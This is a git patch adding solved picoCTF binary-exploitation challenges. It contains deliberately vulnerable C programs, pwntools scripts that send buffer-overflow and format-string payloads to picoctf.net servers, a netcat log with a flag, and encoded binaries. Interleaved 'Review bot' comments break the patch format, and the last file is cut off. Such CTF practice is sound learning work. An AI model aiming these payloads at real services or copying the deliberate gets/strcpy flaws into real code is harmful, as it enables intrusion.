From 532e0931224d10771334e1c0d6e04dc50654c9b6 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Sun, 1 Sep 2024 22:01:27 +0200
Subject: [PATCH] pwn: add already solved challenges
---
 pwn/basic_file_exploit/netcat.log | 21 +++
 pwn/basic_file_exploit/program-redacted.c | 195 ++++++++++++++++++++++
 pwn/buffer_overflow_0/flag.txt | 1 +
 pwn/buffer_overflow_0/solve.sh | 3 +
 pwn/buffer_overflow_0/vuln | Bin 0 -> 16016 bytes
 pwn/buffer_overflow_0/vuln.c | 44 +++++
 pwn/clutter_overflow/chall | Bin 0 -> 12704 bytes
 pwn/clutter_overflow/chall.c | 54 ++++++
 pwn/clutter_overflow/flag.txt | 1 +
 pwn/clutter_overflow/solve.py | 31 ++++
 pwn/cve_xxxx_xxxx/flag.txt | 1 +
 pwn/stonks/solve.py | 43 +++++
 pwn/stonks/vuln.c | 148 ++++++++++++++++
 13 files changed, 542 insertions(+)
 create mode 100644 pwn/basic_file_exploit/netcat.log
 create mode 100644 pwn/basic_file_exploit/program-redacted.c
 create mode 100644 pwn/buffer_overflow_0/flag.txt
 create mode 100755 pwn/buffer_overflow_0/solve.sh
 create mode 100755 pwn/buffer_overflow_0/vuln
 create mode 100644 pwn/buffer_overflow_0/vuln.c
 create mode 100755 pwn/clutter_overflow/chall
 create mode 100644 pwn/clutter_overflow/chall.c
 create mode 100644 pwn/clutter_overflow/flag.txt
 create mode 100755 pwn/clutter_overflow/solve.py
 create mode 100644 pwn/cve_xxxx_xxxx/flag.txt
 create mode 100755 pwn/stonks/solve.py
 create mode 100644 pwn/stonks/vuln.c
diff --git a/pwn/basic_file_exploit/netcat.log b/pwn/basic_file_exploit/netcat.log
new file mode 100644
index 0000000..9fd7e40
--- /dev/null
+++ b/pwn/basic_file_exploit/netcat.log
@@ -0,0 +1,21 @@
+$ nc saturn.picoctf.net 51109
+Hi, welcome to my echo chamber!
+Type '1' to enter a phrase into our database
+Type '2' to echo a phrase in our database
+Type '3' to exit the program
+1
+1
+Please enter your data:
+asdf
+asdf
+Please enter the length of your data:
+4
+4
+Your entry number is: 1
+Write successful, would you like to do anything else?
+2
+2
+Please enter the entry number of your data:
+0
+0
+picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0}
diff --git a/pwn/basic_file_exploit/program-redacted.c b/pwn/basic_file_exploit/program-redacted.c
new file mode 100644
index 0000000..ad40974
--- /dev/null
+++ b/pwn/basic_file_exploit/program-redacted.c
@@ -0,0 +1,195 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+#define WAIT 60
+
+
+static const char* flag = "[REDACTED]";
+
+static char data[10][100];
+static int input_lengths[10];
+static int inputs = 0;
+
+
+
+int tgetinput(char *input, unsigned int l)
+{
+ fd_set input_set;
+ struct timeval timeout;
+ int ready_for_reading = 0;
+ int read_bytes = 0;
+
+ if( l <= 0 )
+ {
+ printf("'l' for tgetinput must be greater than 0\n");
+ return -2;
+ }
+
+
+ /* Empty the FD Set */
+ FD_ZERO(&input_set );
+ /* Listen to the input descriptor */
+ FD_SET(STDIN_FILENO, &input_set);
+
+ /* Waiting for some seconds */
+ timeout.tv_sec = WAIT; // WAIT seconds
+ timeout.tv_usec = 0; // 0 milliseconds
+
+ /* Listening for input stream for any activity */
+ ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
+ /* Here, first parameter is number of FDs in the set,
+ * second is our FD set for reading,
+ * third is the FD set in which any write activity needs to updated,
+ * which is not required in this case.
+ * Fourth is timeout
+ */
+
+ if (ready_for_reading == -1) {
+ /* Some error has occured in input */
+ printf("Unable to read your input\n");
+ return -1;
+ }
+
+ if (ready_for_reading) {
+ read_bytes = read(0, input, l-1);
+ if(input[read_bytes-1]=='\n'){
+ --read_bytes;
+ input[read_bytes]='\0';
+ }
+ if(read_bytes==0){
+ printf("No data given.\n");
+ return -4;
+ } else {
+ return 0;
+ }
+ } else {
+ printf("Timed out waiting for user input. 
Press Ctrl-C to disconnect\n");
+ return -3;
+ }
+
+ return 0;
+}
+
+
+static void data_write() {
+ char input[100];
+ char len[4];
+ long length;
+ int r;
+
+ printf("Please enter your data:\n");
+ r = tgetinput(input, 100);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ while (true) {
+ printf("Please enter the length of your data:\n");
+ r = tgetinput(len, 4);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ if ((length = strtol(len, NULL, 10)) == 0) {
+ puts("Please put in a valid length");
+ } else {
+ break;
+ }
+ }
+
+ if (inputs > 10) {
+ inputs = 0;
+ }
+
+ strcpy(data[inputs], input);
+ input_lengths[inputs] = length;
+
+ printf("Your entry number is: %d\n", inputs + 1);
+ inputs++;
+}
+
+
+static void data_read() {
+ char entry[4];
+ long entry_number;
+ char output[100];
+ int r;
+
+ memset(output, '\0', 100);
+
+ printf("Please enter the entry number of your data:\n");
+ r = tgetinput(entry, 4);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ if ((entry_number = strtol(entry, NULL, 10)) == 0) {
+ puts(flag);
+ fseek(stdin, 0, SEEK_END);
+ exit(0);
+ }
+
+ entry_number--;
+ strncpy(output, data[entry_number], input_lengths[entry_number]);
+ puts(output);
+}
+
+
+int main(int argc, char** argv) {
+ char input[3] = {'\0'};
+ long command;
+ int r;
+
+ puts("Hi, welcome to my echo chamber!");
+ puts("Type '1' to enter a phrase into our database");
+ puts("Type '2' to echo a phrase in our database");
+ puts("Type '3' to exit the program");
+
+ while (true) {
+ r = tgetinput(input, 3);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ if ((command = strtol(input, NULL, 10)) == 0) {
+ puts("Please put in a valid number");
+ } else if (command == 1) {
+ data_write();
+ puts("Write successful, would you like to do anything else?");
+ } else if (command == 2) {
+ if (inputs == 0) {
+ puts("No data yet");
+ 
continue; + } + data_read(); + puts("Read successful, would you like to do anything else?"); + } else if (command == 3) { + return 0; + } else { + puts("Please type either 1, 2 or 3"); + puts("Maybe breaking boundaries elsewhere will be helpful"); + } + } + + return 0; +} diff --git a/pwn/buffer_overflow_0/flag.txt b/pwn/buffer_overflow_0/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/buffer_overflow_0/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/buffer_overflow_0/solve.sh b/pwn/buffer_overflow_0/solve.sh new file mode 100755 index 0000000..defe7bf --- /dev/null +++ b/pwn/buffer_overflow_0/solve.sh @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | nc saturn.picoctf.net 65443 
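Review bot: `data_read` indexes `data[]` and `input_lengths[]` with `entry_number - 1` taken straight from `strtol`, with no check that it lies within the 1..`inputs` range, so the `strncpy` reads from outside the arrays for any other value. A bounds check before the copy, `if (entry_number < 1 || entry_number > inputs) { puts("No such entry"); return; }`, closes that path. `data_write` has the matching off-by-one: `if (inputs > 10)` only resets after `inputs` has already reached 10 and `strcpy` has written to `data[10]`, so it should be `>= 10`. In `tgetinput`, `read()` can return 0 or -1, and `input[read_bytes-1]` then indexes before the buffer; test `read_bytes <= 0` before touching `input`.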
diff --git a/pwn/buffer_overflow_0/vuln b/pwn/buffer_overflow_0/vuln new file mode 100755 index 0000000000000000000000000000000000000000..e4e63e14afea88a0d1c6f3c8215cddff4b735005 GIT binary patch literal 16016 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 Vy&@!GhWQo@3=%L&Xjp*M0RYx}_fh}= literal 0 HcmV?d00001 diff --git a/pwn/buffer_overflow_0/vuln.c b/pwn/buffer_overflow_0/vuln.c new file mode 100644 index 0000000..ddeb1b5 --- /dev/null +++ b/pwn/buffer_overflow_0/vuln.c 
@@ -0,0 +1,44 @@
+#include
+#include
+#include
+#include
+
+#define FLAGSIZE_MAX 64
+
+char flag[FLAGSIZE_MAX];
+
+void sigsegv_handler(int sig) {
+ printf("%s\n", flag);
+ fflush(stdout);
+ exit(1);
+}
+
+void vuln(char *input){
+ char buf2[16];
+ strcpy(buf2, input);
+}
+
+int main(int argc, char **argv){
+
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(flag,FLAGSIZE_MAX,f);
+ signal(SIGSEGV, sigsegv_handler); // Set up signal handler
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+
+ printf("Input: ");
+ fflush(stdout);
+ char buf1[100];
+ gets(buf1);
+ vuln(buf1);
+ printf("The program will exit now\n");
+ return 0;
+}
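Review bot: `main` reads input with `gets(buf1)` and `vuln` copies it into the 16-byte `buf2` with `strcpy`, so neither step bounds the data; this is the exercise's intended flaw, but the hardened equivalents are `fgets(buf1, sizeof buf1, stdin)` and `snprintf(buf2, sizeof buf2, "%s", input)`. The `fgets(flag, FLAGSIZE_MAX, f)` result is unchecked and `f` is never closed, so an empty flag file prints an empty flag with no message. `sigsegv_handler` calls `printf`, `fflush` and `exit`, none of which are async-signal-safe; `write(STDOUT_FILENO, flag, strlen(flag))` followed by `_exit(1)` is the safe form inside a handler.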
diff --git a/pwn/clutter_overflow/chall b/pwn/clutter_overflow/chall new file mode 100755 index 0000000000000000000000000000000000000000..c37dc1d37638a598eb6334e83065bb89f18c9005 GIT binary patch literal 12704 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 literal 0 HcmV?d00001 diff --git a/pwn/clutter_overflow/chall.c b/pwn/clutter_overflow/chall.c new file mode 100644 index 0000000..a5c070f --- /dev/null +++ b/pwn/clutter_overflow/chall.c 
@@ -0,0 +1,54 @@ +#include +#include + +#define SIZE 0x100 +#define GOAL 0xdeadbeef + +const char* HEADER = +" ______________________________________________________________________\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n" +"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n" +"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n" +"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n" +"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n" +"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n" +".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n" +"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n" +"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n" +"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n" +"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n" +"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""; + +int main(void) +{ + long code = 0; + char clutter[SIZE]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts(HEADER); + puts("My room is so cluttered..."); + 
puts("What do you see?"); + + gets(clutter); + + + if (code == GOAL) { + printf("code == 0x%llx: how did that happen??\n", GOAL); + puts("take a flag for your troubles"); + system("cat flag.txt"); + } else { + printf("code == 0x%llx\n", code); + printf("code != 0x%llx :(\n", GOAL); + } + + return 0; +} diff --git a/pwn/clutter_overflow/flag.txt b/pwn/clutter_overflow/flag.txt new file mode 100644 index 0000000..4944a4b --- /dev/null +++ b/pwn/clutter_overflow/flag.txt @@ -0,0 +1 @@ +flag{FAKEFLAG} diff --git a/pwn/clutter_overflow/solve.py b/pwn/clutter_overflow/solve.py new file mode 100755 index 0000000..2a489b4 --- /dev/null +++ b/pwn/clutter_overflow/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("chall") + +context.binary = exe + + +def conn(): + if args.LOCAL: + r = process([exe.path]) + if args.DEBUG: + gdb.attach(r) + else: + r = remote("mars.picoctf.net", 31890) + + return r + + +def main(): + r = conn() + # gdb.attach(r, 'break *main+143') + print(r.recvuntil(b'What do you see?\n')) + r.sendline((b'A' * 264) + p64(0xdeadbeef)) + print(r.recvall().decode()) + + +if __name__ == "__main__": + main() diff --git a/pwn/cve_xxxx_xxxx/flag.txt b/pwn/cve_xxxx_xxxx/flag.txt new file mode 100644 index 0000000..c8eaedd --- /dev/null +++ b/pwn/cve_xxxx_xxxx/flag.txt @@ -0,0 +1 @@ +CVE-2021-34527 diff --git a/pwn/stonks/solve.py b/pwn/stonks/solve.py new file mode 100755 index 0000000..b3312e5 --- /dev/null +++ b/pwn/stonks/solve.py 
@@ -0,0 +1,43 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.pwntools
+
+from pwn import *
+
+ADDR = "mercury.picoctf.net 59616"
+HOST, PORT = ADDR.split(" ")
+
+def main():
+ for x in range(1,2):
+ r = remote(HOST, PORT)
+ r.recvline()
+ r.recvline()
+ r.recvline()
+ r.recvline()
+ r.recvline()
+ r.sendline(b'1')
+ r.recvline()
+ r.recvline()
+ r.recvline()
+
+ # r.sendline(f'%{x}$s'.encode())
+ # print(f'%{x}$s'.encode())
+ r.sendline(b"%x." * 99 + b"%x")
+ r.recvline()
+ result = r.recvline()
+ print(result)
+ unpacked = []
+ for x in result.strip().split(b"."):
+ x = int(x, 16)
+ print(x)
+ unpacked.extend([
+ (x & 0x000000FF),
+ (x & 0x0000FF00) >> 8,
+ (x & 0x00FF0000) >> 16,
+ (x & 0xFF000000) >> 24,
+ ])
+ for x in unpacked:
+ if x >= ord('!') and x <= ord('~'):
+ print(chr(x), end='')
+
+if __name__ == "__main__":
+ main()
diff --git a/pwn/stonks/vuln.c b/pwn/stonks/vuln.c
new file mode 100644
index 0000000..5b385a2
--- /dev/null
+++ b/pwn/stonks/vuln.c
@@ -0,0 +1,148 @@
+#include
+#include
+#include
+#include
+
